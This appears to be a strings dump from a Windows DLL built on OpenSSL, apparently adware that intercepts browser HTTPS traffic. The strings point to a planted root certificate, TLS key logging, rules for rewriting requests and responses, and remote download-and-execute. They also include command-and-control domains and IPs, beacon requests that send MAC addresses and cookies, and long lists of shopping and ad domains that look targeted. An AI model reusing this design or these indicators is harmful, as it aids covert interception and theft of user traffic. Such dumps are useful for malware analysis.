PEM part of OpenSSL 1.0.2h 3 May 2016

Enter PEM pass phrase:

phrase is too short, needs to be at least %d chars

ANY PRIVATE KEY

ENCRYPTED PRIVATE KEY

PRIVATE KEY

X509 CERTIFICATE

NEW CERTIFICATE REQUEST

CERTIFICATE REQUEST

TRUSTED CERTIFICATE

os.length <= (int)sizeof(ret->session_id)

OpenSSL 1.0.2h 3 May 2016

.\ssl\ssl_cert.c

TLSv1 part of OpenSSL 1.0.2h 3 May 2016

value.other

value.x509cert

value.sdsicert

value.keybag

value.shkeybag

value.safes

value.bag

DES part of OpenSSL 1.0.2h 3 May 2016

libdes part of OpenSSL 1.0.2h 3 May 2016

IDEA part of OpenSSL 1.0.2h 3 May 2016

EVP part of OpenSSL 1.0.2h 3 May 2016

RC2 part of OpenSSL 1.0.2h 3 May 2016

.pp@0

aEÐ

 (#EÚ

ÚE<<0

keylen <= sizeof key

EVP_CIPHER_key_length(cipher) <= (int)sizeof(md_tmp)

CONF_def part of OpenSSL 1.0.2h 3 May 2016

[%s] %s=%s

[[%s]]

Key Encipherment

keyEncipherment

Key Agreement

keyAgreement

Certificate Sign

keyCertSign

EXTENDED_KEY_USAGE

PKEY_USAGE_PERIOD

%*sZone: %s, User:

<unsupported>

othername:<unsupported>

X400Name:<unsupported>

EdiPartyName:<unsupported>

email:%s

DNS:%s

URI:%s

IP Address:%d.%d.%d.%d

.\crypto\x509v3\v3_skey.c

.\crypto\x509v3\v3_akey.c

%*scrlUrl:

CERTIFICATEPOLICIES

d.cpsuri

d.usernotice

%*sCPS: %s

%*sOrganization: %s

%*sNumber%s:

%*sExplicit Text: %s

%*sPolicy Text: %s

XX

%.14s.dZ

%*sSigned Certificate Timestamp:

RAND part of OpenSSL 1.0.2h 3 May 2016

You need to read the OpenSSL FAQ, hXXp://VVV.openssl.org/support/faq.html

PROXY_CERT_INFO_EXTENSION

X:

%lu:%s:%s:%d:%s

Private-Key: (%d bit)

Public-Key: (%d bit)

Private-Key

Public-Key

%s: (%d bit)

DH Private-Key

DH Public-Key

private-key:

public-key:

recommended-private-length: %d bits

.\crypto\dh\dh_key.c

%'%1$=%C%K%O%s%

.%.-.3.7.9.?.W.[.o.y.

C%C'C3C7C9COCWCiC

nkey <= EVP_MAX_KEY_LENGTH

.\crypto\evp\evp_key.c

?456789:;<=

!"#$%&'()* ,-./0123

SSLv3 part of OpenSSL 1.0.2h 3 May 2016

CLIENT_RANDOM %s %s

c:/sslkey/laskeydb.log

key expansion

client write key

server write key

%s:%d: rec->data != rec->input

j <= (int)sizeof(ctx->key)

keyfunc

keylength

ECDSA part of OpenSSL 1.0.2h 3 May 2016

.\crypto\pkcs12\p12_key.c

.\out32/.\out32/ssl/certs

.\out32/.\out32/ssl/cert.pem

SSL_CERT_DIR

SSL_CERT_FILE

ADVAPI32.DLL

KERNEL32.DLL

NETAPI32.DLL

USER32.DLL

rsa_keygen_bits

rsa_keygen_pubexp

hexkey

%s %s%lu (%s0x%lx)

ASN1 OID: %s

NIST CURVE: %s

Field Type: %s

Basis Type: %s

CMS_CertificateChoices

d.issuerAndSerialNumber

d.subjectKeyIdentifier

d.crl

certificates

keyEncryptionAlgorithm

encryptedKey

CMS_KeyTransRecipientInfo

keyAttrId

keyAttr

CMS_OtherKeyAttribute

CMS_RecipientKeyIdentifier

d.rKeyId

CMS_KeyAgreeRecipientIdentifier

CMS_RecipientEncryptedKey

CMS_OriginatorPublicKey

d.originatorKey

CMS_OriginatorIdentifierOrKey

recipientEncryptedKeys

CMS_KeyAgreeRecipientInfo

keyIdentifier

keyDerivationAlgorithm

CMS_PasswordRecipientInfo

d.ktri

d.kari

d.kekri

d.pwri

d.ori

d.signedData

d.envelopedData

d.digestedData

d.encryptedData

d.authenticatedData

d.compressedData

d.allOrFirstTier

d.receiptList

keyInfo

otherCertFormat

otherCert

CMS_OtherCertificateFormat

d.certificate

d.extendedCertificate

d.v1AttrCert

d.v2AttrCert

Load certs from files in a directory

%s%clx.%s%d

s->init_num == (int)s->d1->w_msg_hdr.msg_len   DTLS1_HM_HEADER_LENGTH

((long)msg_hdr->msg_len) > 0

invalid state reached %s:%d

s->d1->w_msg_hdr.msg_len   ((s->version==DTLS1_BAD_VER)?3:DTLS1_CCS_HEADER_LENGTH) == (unsigned int)s->init_num

s->d1->w_msg_hdr.msg_len   DTLS1_HM_HEADER_LENGTH == (unsigned int)s->init_num

retransmit: message %d non-existant

RSA PRIVATE KEY

DSA PRIVATE KEY

EC PRIVATE KEY

GOST signature length is %d

Verifying - %s

TXT_DB part of OpenSSL 1.0.2h 3 May 2016

DTLSv1 part of OpenSSL 1.0.2h 3 May 2016

NETSCAPE_CERT_SEQUENCE

ECDH part of OpenSSL 1.0.2h 3 May 2016

%s.dll

.\crypto\asn1\x_pkey.c

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

Visual C   CRT: Not enough memory to complete call to strerror.

Operation not permitted

Inappropriate I/O control operation

Broken pipe

operator

GetProcessWindowStation

c:\sslkey\dump.log

c:\sslkey\modified.log

HTTPS

Request[%s]:original

Request[%s]:modified

Respond[%s]:original

Respond[%s]:modified

Request[%s]:original end

Request[%s]:modified end

Respond[%s]:original end

Respond[%s]:modified end

iexplore.exe

Software\Microsoft\Windows\Shell\Associations\UrlAssociations\Http\UserChoice\

http\shell\open\command\

GetDefaultBrowserPath(), RegOpenKeyEx(%s) fail, error=%0X

GetDefaultBrowserPath(), RegQueryValueEx(%s) fail, dwType=%0X, error=%0X

GetDefaultBrowserPath(), RegQueryValueEx(%s) OK, wszBuffer=%s

NfCheckDns pid=%d, Domain=%s

NfCheckDns process[%s], processId=%d, rmport=%d, remoteAddr=%s, iFlag=%d, process not read for SSL, soSSL ByPass

NfCheckDns process[%s], processId=%d, rmport=%d, remoteAddr=%s, iFlag=%d, process not ready for SSL, soSSL ByPass, errno=%x

opera.exe

NfCheckDns process is opera.exe version=%s

[1234567890.]

NfCheckDns IP=%s match

NfCheckDns is not ssl Try Domain=%s

NfCheckDns have try SSL Domain=%s icount=%d, match

NfCheckDns try SSL Domain=%s icount=%d

NfCheckDns Domain=%s match, i=%d

NfCheckDns Domain=%s not match

NfCheckSSLDomain pid=%d, Domain=%s

NfCheckSSLDomain IP=%s match

NfCheckSSLDomain Domain=%s match, i=%d

NfCheckSSLDomain Domain=%s not match

RefreshDns domain=%s

RefreshDns m_SSLIPMap p->Flags.DW=%x, DNSREC_AUTHORITY ip=%s

RefreshDns m_SSLIPMap.insert m_SSLIPMap ip=%s

hXXps://([^/:] ):443/(S*)

HTTP/1.1 302 Found

cdf4rz.dangyu.info

54.201.224.55

get_httpresp: connect [%s] faile

get_httpresp: connect [%s] ok

get_httpresp: try connect ip=%s

get_httpresp: send(%s) faile

GET /%s/log/err.php HTTP/1.1

Host: %s

QUDAO: %s

Agent: %s

MACS: %s

ERRIMG: %s

Cookie: %s

NfCheckRules process[%s], rmport=%d, remoteAddr=%s, iFlag=%d

HTTP/1.1 200 OK

hXXp://([^/] )/(\S*)

ProxyReq PxAct=%s

ProxyReq PxAct=Fellow, URL=%s

ProxyReq PxAct=Fellow, headers=%s

ProxyReq PxAct=Fellow, RespToMSTCP httpresp=%.*s

PxyRspUrl

ProxyReq PxyRsp, PxyRspUrl=%s

Post_PxyRsp , PxyRspUrl=%.*s

[NF]rule[%d][%s], format=%.*s not support %%*,n

[NF]rule[%d][%s], format=%.*s [%d,%d] over range!!!!

[NF]rule[%d][%s], format=%.*s [%d,%d] not exist!!!!

nurl

toexe.filename

toexe.args

nrspurl

rw_rule[%d]: iTimes[%d] - rw_checktime[%d] >= rw_rule[%d].rw_fttime[%d]

rw_rule[%d]: iTimes[%d] >= GlobalVars::gst_rw_rule[%d].iLimits[%d]

CheckGetType rw_rule[%d] rw_conds[%d] is not Match, but refered!!!!

rr_rule[%d]: iTimes[%d] >= GlobalVars::gst_rr_rule[%d].iLimits[%d]

[NF]Replace rule[%d], format=%.*s [%d,%d] not exist!!!!

CheckRRType rorgcap[%d][%d]=%.*s!

ReqRep icond=%d: HS_STATUS[ilen=%d]:%.*s

ReqRep icond=%d: HS_HEAD[%s]:%s

ReqRep icond=%d: HS_CONTENT:%.*s

ReqRep Header.toSting()=%s

ReqRep[request_regrsp] icond=%d: HS_STATUS[ilen=%d]:*s

ReqRep[request_regrsp] icond=%d: HS_HEAD[%s]:%s

ReqRep[request_regrsp] icond=%d: HS_CONTENT:*s

ReqRep finished: HS_STATUS:%s

GET /%.*s HTTP/1.1

User-Agent: Mozilla/5.0 (gid %s; cid %s)

get_httpresp: start!!, url=%.*s, headers=%s

get_httpresp: sendbuf=%s

get_httpresp: domain=%s

POST /%.*s HTTP/1.1

post_httpresp: start!! url=%.*s, headers=%s, postbody=%s

post_httpresp: sendbuf=%s

post_httpresp: domain=%s

%s size too small , the value=%.*s

g_debug=%d

g_charorg=%s

g_charmap=%s

g_exclude[%d]=%s

g_download [%d]= %s %d %s

g_precmd

([WwTt][SsHh])\s (\d )\s "([^"]*)"\s ([^\r\n]*)

g_precmd [%d]= %d %d %s %s

g_postcmd

g_postcmd [%d]= %d %d %s %s

g_postproinfo=%d

g_limflagip=%s

g_maxnet=%d

g_muteip=%s

g_rrurl

g_rrurl valus=[%.*s]!

g_irrecd valus=[%.*s]! GlobalVars::g_irrecd=%d

g_imaxrcv valus=[%.*s]! GlobalVars::g_imaxrcv=%d

g_bFilterSSL=%d

g_rootm_x509URL

g_rootm_x509URL valus=[%.*s]!

g_rootm_pkeyURL

g_rootm_pkeyURL valus=[%.*s]!

g_rootm_x509Len=%d

g_rootm_pkeyLen

g_rootm_pkeyLen=%d

g_rootm_subject=%s

g_blockspdy=%d

g_rootm_x509RegURL

g_rootm_x509RegURL valus=[%.*s]!

g_sslkey

g_sslkey valus=[%.*s],expanded keyfile=%s!

g_rootm_x509RegLen=%d

g_tjdefbrowser=%d

g_tjssldomain=%d

g_rptsslrdy=%d

g_sslbrowser=%s

g_ssltrybrowser=%s

g_ssldomain2ip=%d

g_heartbeat=%d

nf_rule GlobalVars::i_rules=%d, domain=%s

gethostbyname(%s) error

nf_rule GlobalVars::i_rules=%d, domain=%s be resolved

rw_id valus=[%.*s] crw_rule.rw_id=%d

rw_cond match=[%.*s %.*s], isNOT = %d, isOR=%d, replace=[%.*s]!

rw_act valus=[%.*s]! crw_rule.rw_act=%d

rw_tounzip valus=[%.*s]! crw_rule.tounzip=%d

rw_psturl

rw_psturl valus=[%.*s]!

rw_limit valus=[%.*s] crw_rule.iLimits=%d

rw_arfi already exist index[%d]=%s!

rw_arfi dont exist index[%d]=%s, filename=%.*s!

rw_arfi new one index[%d]=%s!

rw_nurl

rw_nurl valus=[%.*s]!

rw_groupid valus=[%.*s] > MAX_GROUPS reset crw_rule.groupid=%d

rw_groupid valus=[%.*s] crw_rule.groupid=%d

rw_ckid valus=[%.*s] crw_rule.rw_ckid=%d

rw_fttime valus=[%.*s] crw_rule.rw_fttime=%d

rw_act valus=[%.*s]! crw_rule.rw_checktimemode=%d

rw_execmd

rw_execmd = %d %d %s %s

rw_map[%d] [%s] ==> [%s]!

nf_rule m_dnsrules.insert(%s)

nf_rule m_dnsset.insert(%s)

nf_rule GlobalVars::i_rules=%d, add m_SSLIPMap[%s] ip=%s

nf_rule GlobalVars::i_rules=%d, add m_SSLIPMap[%s] ip=%d.%d.%d.%d

nf_dns GlobalVars::gi_dns=%d, match rules=%s, resolve ip=%d.%d.%d.%d

icur_rrrule=%d, iget_conds=%d, rq_cond match=[%.*s %.*s], isNOT = %d, isOR=%d, replace=[%.*s]!

icur_rrrule=%d, irsp_conds=%d, rr_cond match=[%.*s %.*s], isNOT = %d, isOR=%d, replace=[%.*s]!

rr_act valus=[%.*s]! crw_rule.rr_act=%d, g_rrmode=%d

rr_rspurl

rr_rspurl valus=[%.*s]!

rr_tounzip valus=[%.*s]! crr_rule.rw_tounzip=%d

certinfo.daysValid=%d

certinfo.sigType=%d

certinfo.subject.commonName=%s

certinfo.subject.country=%s

certinfo.subject.email=%s

certinfo.subject.friendName=%s

certinfo.subject.locality=%s

certinfo.subject.org=%s

certinfo.subject.state=%s

certinfo.subject.sur=%s

certinfo.subject.unit=%s

pf_insertCADns(%s,%s)

VerifyCertContent fail, sleept=%d, give up

VerifyCertContent fail, sleept=%d

Process_Config get x509[%s], ntStatus=%d, lssl=%d

Process_Config get pkey[%s], ntStatus=%d, lssl=%d

cdf4pz.dangyu.info

cdf4pz.insearchs.com

hXXp://%s:%d/%s/adobe.com/config.php

09:18:02

MAC: %s

BT: %s %s

Proc: %s

PathUnExpandEnvStrings %s fail

CreateFile %s faile, errno=%d

hXXp://

rw_rsps[%d]:%.*s

reps=%.*s, isBackRef=%d

refcap[%d][%d] malloc:%.*s

processReceive[respond_regrsp] icond=%d: HS_STATUS[ilen=%d]:*s

processReceive[respond_regrsp] icond=%d: HS_HEAD[%s]:%s

processReceive[respond_regrsp] icond=%d: HS_CONTENT:*s

processRReceive rsps[%d]->ePF == HS_HEADER, find Header[%s], length=%d

processReceive rsps[%d]->ePF == HS_HEADER, find Header[%s]

processReceive rsps[%d]->ePF == HS_CONTENT/HS_STATUS, iLen=%d, content=%.*s

processRReceive %%d,d reps =%.*s

processRReceive not %%d,d reps =%.*s

processRReceive reps=%.*s isBackRef=%d

processRReceive rw_rsps[%d] match cap=%.*s

processRReceive i=%d rw_rsps cap=%.*s,%%%d^%%%d

processRReceive i=%d rrsp_conds cap=%.*s,%%%d^%%%d

ReportRecord: iformat=%d, format=%.*s

processRReceive 8 pTcpNE->rorgcap[1][0]=%.*s

ReportRecord irrule=%d, icond=%d, igroup=%d, rorgcap=%.*s, len=%d, record=%.*s, len=%d

ReportRecord: 2 iformat=%d, format=%.*s

ReportRecord irrule=%d, record=%.*s, ilen=%d

ReportRecord: 3 iformat=%d, format=%.*s

ReportRecord: 4 iformat=%d, format=%.*s

ProcRR, ReportRecord len=%d, buff:%.*s

ProcRR sendrpt %s

CheckGetType(id=%I64u) gettype= %d

rrtype= %d

{"browser":"%s","conn":"%s=>%s","httperr":"RspUncompress fail,rt=%d"}

httperr %s

()$^.* ?[]|\-{},:=!

threadStart id=%d

NfCheckRules (id=%I64u) localport=%d, localAddr=%s, rmport=%d, remoteAddr=%s, iFlag=%d

{"browser":"%s","ssltry":"FAIL"}

LogSSLTryBrowser %s

{"browser":"%s","ssltry":"OK"}

{"browser":"%s","conn":"%s=>%s","domain":"%s"}

LogSSLDomain %s

dataPartAvailable OT_SSL_HANDSHAKE_OUTGOING rt=%d, hostname=%.*s

{"browser":"%s","sslerr":"%s"}

LogSSLException %s

have %s

VVV.baidu.com

VVV.google.com

VVV.126.com

%s.tmp

downloadfile[%s] fail

1.3.6.1.5.5.7.3.1

1.3.6.1.4.1.311.10.3.3

2.16.840.1.113730.4.1

nf_getProcessName=%s, pproc=%s

resolve wmi_dirip[%s]=%s OK

%.4d%.2d%.2d %.2d:%.2d:%.2d:%d

nf_getDisplayFromKernel g_MACs=%s

getMACInfo %s

{"defbrowser":"%s","version":"%s"}

heartbeat upt=%d minutes

tfpf stop, isnfinit=%d, ispfinit=%d, bIsFaile=%d, living time=%d!

{"ImageBase":"%0X","ImageSize":"%u","buildNumber":"%u"}

HTTP/1.

http/1.

Wtsapi32.dll

SSL\SSLDataProvider.cpp

%s-%s#ss

%s-%s-%s#child

{"browser":"%s","conn":"%s=>%s","domain":"%s","msg":"%s"}

127.0.0.1

SSLFilter.cpp

__FILE__:%s, __LINE__:%d, SSLFilter::tcp_packet() getSelfSignedCert(test) failed

__FILE__:%s, __LINE__:%d, SSLFilter::tcp_packet() sdTemp.init failed

__FILE__:%s, __LINE__:%d, SSLFilter::tcp_packet() bypass exception

__FILE__:%s, __LINE__:%d, SSLFilter::tcp_packet() Weak DH prime, do not filter such connections

__FILE__:%s, __LINE__:%d, addTlsException(TLS_ALL_CIPHERS)

__FILE__:%s, __LINE__:%d, SSL_connect(m_sdRemote.m_pSSL) == 0

__FILE__:%s, __LINE__:%d, getSelfSignedCert fail

__FILE__:%s, __LINE__:%d, getSignedCert fail

__FILE__:%s, __LINE__:%d, m_sdLocal.init fail

__FILE__:%s, __LINE__:%d, BIO_write fail

__FILE__:%s, __LINE__:%d, SSL_accept(m_sdLocal.m_pSSL) fail, err=%d

__FILE__:%s, __LINE__:%d, SSL_get_peer_certificate fail

__FILE__:%s, __LINE__:%d, SSL_accept fail, err=%d

__FILE__:%s, __LINE__:%d, SSLRead_client, err=%d

__FILE__:%s, __LINE__:%d, SFS_SERVER_HANDSHAKE, len == 0

__FILE__:%s, __LINE__:%d, SSL_accept fail, n=0

__FILE__:%s, __LINE__:%d, SSLRead_server, n=%d

__FILE__:%s, __LINE__:%d, SFS_SERVER_HANDSHAKE_REQUEST_CLIENT_CERT, n=0

__FILE__:%s, __LINE__:%d, SSLRead_client, n=%d

__FILE__:%s, __LINE__:%d, SSL_accept, err=%d

__FILE__:%s, __LINE__:%d, SSL_connect(m_sdRemote.m_pSSL), err=%d

__FILE__:%s, __LINE__:%d, SSL_connect(m_sdRemote.m_pSSL), n=%d

__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, SSLFilter::tcp_packet() bypass exception

surfeasy.com

opera-proxy.net

__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, host is surfeasy.com or opera-proxy.net

__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, SSL_connect(m_sdRemote.m_pSSL) err=%d

__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, SSL_connect(m_sdRemote.m_pSSL) n=0

__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, BIO_write fail

__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, SSLRead_client(m_sdRemote) fail

__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, SSL_connect(m_sdRemote.m_pSSL) fail, errno=%d

__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, SSL_connect(m_sdRemote.m_pSSL) == 0

__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, SSL_accept(m_sdLocal.m_pSSL) fail, errno=%d

__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, SSL_accept(m_sdLocal.m_pSSL) == 0

__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, BIO_write < 0

PORT

504 Unsupported transfer mode

504 Unsupported command

PORT

%s.%s.%s.%s:%d

%s:%s

[%s]:%s

File-Count: %d

Total-Bytes: %d

File-Name: %s

{0946134E-4C7F-11D1-8222-444553540000}

|.^$* ?()[\

(Windows%d.%d.%d)

SYSTEM\CurrentControlSet\Services\%s

NBMediaInfo_Adv.ini

%s\system32\%s

NBMediaInfo_Adv.ini;

0.0.0.0

%s:xxxxxx|

1.0.1.0

%d.%d.%d.%d

WARNING: %s failed with error %d (%s)

cdf4ps.dangyu.info

GET /xcldnfpf/log/proclog.php HTTP/1.1

get_httpresp: send(%s) ok

CreateProcessAsUser(%s %s ) fail errno[%d]

WinExecAndWait32(%s %s ) timeout[%d]

H:\nfsdk-src-1.5.1.4-pf-src-1.1.6.8\bin\Release\Win32\PFHttpContentFilter.pdb

PFHttpContentFilter.dll

GetWindowsDirectoryA

KERNEL32.dll

RegOpenKeyExA

RegCloseKey

ADVAPI32.dll

ShellExecuteA

SHELL32.dll

PSAPI.DLL

WS2_32.dll

DNSAPI.dll

CertCreateCertificateContext

CertFreeCertificateContext

CertGetCertificateChain

CertFreeCertificateChain

CertOpenStore

CertAddEncodedCertificateToStore

CertVerifyCertificateChainPolicy

CertCloseStore

CertOpenSystemStoreA

CertEnumCertificatesInStore

CertFindCertificateInStore

CertAddCertificateContextToStore

PFXExportCertStoreEx

CRYPT32.dll

IPHLPAPI.DLL

VERSION.dll

GetProcessHeap

GetCPInfo

PeekNamedPipe

USER32.dll

ReportEventA

OLEAUT32.dll

l}C.we

zcÁ

.?AVHttpFilter@@

.?AVHTTPFilter@ProtocolFilters@@

.?AVSMTPFilter@ProtocolFilters@@

.?AVFTPFilter@ProtocolFilters@@

.?AVFTPDataFilter@ProtocolFilters@@

Inappropriate I/O control opera

C:\Windows\Explorer.EXE

4C987A994A63A342018DC4A6FA86CD43.tmp

54.190.23.82

.google-analytics.com

.doubleclick.net

.googleadservices.com

.google.com

.facebook.com

.bidswitch.net

.amazon.com

.amazon.cn

.agoda.com

.booking.com

.makemytrip.com

.tripadvisor.

VVV.expedia.

.edreams.com

.priceline.com

.rentalcars.com

.kayak.com

.hotelurbano.com

.decolar.com

.hotelscombined.com

.trivago.com

.hostelworld.com

.orbitz.com

.hoteltonight.com

.youzhan.com

.biyi.cn

.hilton.com

.hilton.com.cn

.aliexpress.com

.bwinpartypartners.com

.walmart.com

secure.booking.com

googleads.g.doubleclick.net

VVV.googleadservices.com

VVV.googletraveladservices.com

knowbrid.com

VVV.twoptrip.com

.bstatic.com

VVV.google.

s.click.aliexpress.com

.ebay.com

VVV.ebay.

rover.ebay.

cgi.ebay.

.bing.com

.netshoes.com.mxar

.linksynergy.com

.ad.soicos.com

.area51buy.com

.saraiva.com.br

.m.pontofrio.com.brarea51buy.com

.m.extra.com.brarea51buy.com

.googlesyndication.com

.zoznam.skzougla.grzonaprop.com.arziare.comzengaming.comyouweekly.gryahoo.comyadi.skxskt.com.vnxem.vnwydawajdobrze.comwyborcza.plVVV.kurir.rs

.VVV.ad.nlwuxiaworld.comwradio.com.mxwowkeren.comwowhead.comworldtimeserver.comworldofmods.ruworldofmods.comworldofbrowsers.comwork.uawikidot.com

.webdunia.comwebaslan.comwday.ruwaseet.netwallpaperswide.comwalla.co.ilw2.animekage.funvulearning.comvstplanet.comvnexpress.netviva.co.idvisioncloud.info

.vijesti.mevietnamnet.vnvietdesigner.netvesti-online.comvector.mevanguardia.comvagas.com.bruznayvse.ruuzmanim.netutre.bgurdupoint.comurbandictionary.com

.upsocl.comuniversomarvel.com.aqultimate-guitar.comujsagomat.huucoin.nettweaktown.comtvonline.idtvnet.lvtuyensinh247.comtunisie-annonce.comtunein.com

.trucksimulator2.rutrophymanager.comtriviador.nettrinixy.rutribalwars.com.pttrend-chaser.comtrabalhosfeitos.comtrabajando.cltotaljerkface.comtomsguide.com

.titirez.rotistory.comtimesofindia.comtimefortravel.netthestar.com.mythesaurus.comthemepack.methehotgames.comtestony.comterra.com.brtennislive.net

.temp-mail.orgtelondasmu.comtelemagazyn.pltelecinco.estechradar.comtechgage.comtawjihnet.nettass.rutampermonkey.nettalks.bytakvim.com.trtailieu.vn

.szekelyhirdeto.infosweetygame.comsuperlutas.com.brsuperhry.czsuperhex.iosuperesportes.com.brsuperdeporte.essugklonistiko.grsubs4series.comsuara.com

.suapesquisa.comstyle-style.comstrelyaj.rustrefa-beki.plstrawpoll.mestockrom.netstartlap.huspynews.rosprzedajemy.plsppokupki.rusport5.co.ilsport360.com

.sport24.grsport24.co.zasponser.co.ilsplix.iospielen.comspfc.netspec-komp.comspanishdict.comsoompi.comsoftobase.comsmods.rusmart-gsm.comslodkiflirt.pl

.skysports.comskyatnightmagazine.comsketchuptextureclub.comsina.com.cnsims4updates.netshopclues.comshemsfm.netshahidlive.cosethmumu.euserebii.netseneweb.com

.segundamano.mxsdamgia.ruscholarship-positions.comsbt.com.brsatoshiwars.comsakshi.comsahadan.comru-minecraft.rurtl.hrrpp.peromania-matrimoniale.ro

.rockingrackets.comreuters.comrepublika.co.idredmondpie.comreddit.comred-hack.rurecord.com.mxrealoem.comratingcero.comranker.comracingbazar.huquotev.com

.quizzmagic.comquizur.comquizalert.compudelek.plprothom-alo.comprogramas-gratis.netpriceprice.comppomppu.co.krpostimees.eepoki.ropokexperto.netpokemondb.net

.pof.complemiona.plplazmaburst2.complayrust.iopini.com.brpicresize.compentapostagma.grpearltrees.compcworld.compcmdaily.compcgamer.compbh2.com

.parentsdome.comparalink.compapajogos.com.brpanet.co.ilpandlr.compaisdelosjuegos.com.arpacogames.comoverclock.netournewstoday.comotvfoco.com.brotomoto.pl

.opensooq.comop.ggontvtime.ruonline-station.netonline-convert.comonegoodthingbyjillee.comon.ccolx.inolx.bgole.com.arolay.com.trokazjum.plojogo.pt

.odkrywcze.plodatv.comobservador.ptoantagonista.comntv.com.trntruyen.infonovinite.eunotebookcheck.netnextmedia.comnewsit.grnewsbomb.grnetfontes.com.br

.net.hrnbalive.ggnaszemiasto.plnaszemargo.plnamedycyne.eumytopgames.netmysmartprice.commyiconpack.commuthead.commuslm.orgmundopositivo.com.brmundonick.com

.mskins.netmowatine.commoonbunnycafe.commohmal.commodworkshop.netmoduri.romodthesims.infomodsgaming.rumods-download.commodfiles.rumoddingway.com

.mod-minecraft.netmmorpg.commlb.commiseria.com.brmiroworld.rumio.tominecraftskins.netminecraftservers.orgminecraftcapes.co.ukmilkyblog.commilenio.com

.milanuncios.commidianews.com.brmetacritic.commerriam-webster.commbc3.netmbc.netmawdoo3.commasrawy.commapsofindia.commapskins.commangahost.net

.maltatoday.com.mtmalaysiable.newsmalavida.commako.co.ilmajorcineplex.commaalaimalar.comls2017.comlowadi.comlovebox.hulove-sims.rulooperman.comlolking.net

.liveuamap.comlivestrong.comlivejournal.comlinguee.eslinguee.com.brlinguee.comlindaikejisblog.comlifewire.comlibertatea.rolibertaddigital.comleninja.com.br

.lelscans.colefora.comleagueofgraphs.comlawebdelprogramador.comlarazon.eslapaginamillonaria.comlaodong.com.vnlance.com.brlacuerda.netlacapital.com.ar

.kurzy.czkulichki.netkudapostupat.bykreszteszt.netknowyourmeme.comkino-teatr.rukijiji.cakhoahoc.tvkhaleejtimes.comkerdos.grkbhgames.comkariyer.net

.karaopa2.rukamusaati.comjuegosdechicas.comjoq.aljobthai.comjobth.comjobrapido.comjn.ptjingames.netjeuxvideo.comjeu.infojavedch.comjapainfo.com.br

.jagranjosh.comislcollective.comislampos.comirecommend.ruinterpals.netinstalki.plinsomnia.grinfojobs.netinfoempleo.cominfoeme.cominewsgr.comindiamart.com

.indiabix.comincrivel.clubiha.com.trigre123.netiefimerida.gricy-veins.comi-drpciv.rohypescience.comhurriyetemlak.comhuffingtonpost.inhoy.com.py

.howtogeek.comhotnews.rohomebasework.nethdonline.vnhattrick.orghackedonlinegames.comhaber1903.comgulfnews.comguiamais.com.brgtaall.com.brgsmsandwich.com.ph

.gravitytales.comgratka.plgota.iogosugamers.netgossiplankanews.comgoodfon.rugoodfamilynews.comgogy.comglobes.co.ilglaz.tvgiallozafferano.itgeek-nose.com

.gazeteduvar.com.trgamster.orggamevicio.comgametracker.comgamesama.comgame01.rug9g.comg5u.pwfuthead.comfutbin.comfunpicplanet.comfresherslive.com

.fresh-stuff4u.comfreedownloadmanager.orgfox.com.trfotospor.comforumotion.comfixya.comfirstpost.comfilmibeat.comfilgoal.comfile-minecraft.comfibladi.dz

.fibalivestats.comfextralife.comfarodevigo.esfarmingsimulator2017.comfarmingmods2015.comfarmingmod.comfarming2017mod.comfarming2015mods.comfarfesh.comfanpage.gr

.fanatik.rofakt.plfafan.krfacilisimo.comexpansion.comexcelsior.com.mxexamveda.comeverydayfeminism.comeva.vneuropapress.eseuro2day.gressada.net

.espnfcasia.comesotericblog.ruepaperlokmat.inentgaming.netentertaintastic.comencuentra24.comempregacampinas.com.brelwatannews.comelpais.comelonce.com

.elnuevodiario.com.nielmaz.comelle.ruelkhabar.comelespectador.comelectronica-pt.comeldiario.eseldestapeweb.comelcorreo.comelcomercio.eselcolombiano.com

.ekantipur.comehowenespanol.comedu-dz.comecoustics.comechoroukonline.comebay.inebay.esebay.dee-monsite.comduolingo.comdummies.comdrugs.comdriver.ru

.drive2.comdressupgames.comdota2lounge.comdota2.rudlouha-videa.czdlh.netdl-protecte.comdivyabhaskar.co.indisneylatino.comdiscuss.com.hkdir.bgdigit.in

.dictionary.comdiariodocentrodomundo.com.brdemotywatory.pldelfi.lvdeckshop.prodcinside.comdanviet.vndailythanthi.comcyberforum.rucumhuriyet.com.tr

.cuantarazon.comcswarzone.comcsgojoe.comcosmopolitan.comcorel-clipart.rucordobavende.comcomputerhoy.comcompraensanjuan.comcomo-eliminar.comcohet.orgcoeg.in

.cnn.comclicrbs.com.brclick.roclavier-arab.orgclasicooo.comciudad.com.arcitethisforme.comcinemagia.rocienradios.comchw.netchuing.netchron.comchip.de

.chip.com.trchimsedinang.comchiletrabajos.clchicosabetudo.com.brcheatcc.comcentraldemangas.net.brcdiscount.comcatfly.rocareersmoveinsa.co.zacancan.ro

.cadena3.combursakerjadepnaker.combuhamster.combuenastareas.combttp-rpg.combseindia.combrightside.meboycracked.combotosani.robongdaplus.vnbomcondutor.pt

.bolsamania.combolha.combobaedream.co.krblogspot.ptblogspot.peblogspot.mkblogspot.com.coblikk.hublacksmith-ran.onlinebinbox.iobgmaps.com

.bestauto.robelmeta.combebekoyunu.com.trbeautifulnara.combeautifuldiscount.combazos.skbazi-otdiha.com.uabazar.bgbarbioyunu.com.trbanglanews24.combaby.ru

.bab.laautotrader.co.ukautoscout24.esautoline.byautobip.comaulafacil.comaukcije.hratsmod.netasianwiki.comasianfanfics.comarynews.tvarchdaily.com

.aquaforum.uaappledaily.com.twanimesonlinebr.com.branimedigitalnetwork.franime-legend.comangelinajoliebrasil.com.brandroidpit.com.brandroidmtk.com

.andhrajyothy.comancient-origins.netanandabazar.comamorenlinea.comamericatv.com.peamadershomoy.bizalyaoum24.comalphacoders.comalo.bgalmogaz.comalmaghreb24.com

